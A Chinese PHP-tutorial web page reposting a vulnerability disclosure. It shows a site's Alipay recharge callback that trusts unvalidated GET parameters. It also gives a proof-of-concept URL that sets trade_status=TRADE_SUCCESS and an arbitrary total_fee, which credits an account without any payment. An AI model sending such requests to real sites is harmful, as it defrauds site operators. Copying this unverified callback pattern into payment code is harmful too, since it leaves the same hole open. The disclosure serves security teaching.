来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 系统未检查传入参数的有效性function onaliapyback() { if ($_GET[ 39;trade_status 39; ] == 39;TRADE_SUCCESS 39;) { $credit2 = $_GET[ 39;total_fe...
|
系统未检查传入参数的有效性
function onaliapyback() {
if ($_GET['trade_status' ] == 'TRADE_SUCCESS') {
$credit2 = $_GET[ 'total_fee'] * $this->setting['recharge_rate' ];
$this->credit($this-> user['uid' ], 0, $credit2, 0, "支付宝充值");
$this->message( "充值成功" , "user/score" );
} else {
$this->message( "服务器繁忙,请稍后再试!" , 'STOP' );
}
}
直接传入total_fee既可
漏洞证明:
/?ebank/aliapyback.html&trade_status=TRADE_SUCCESS&total_fee=99
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
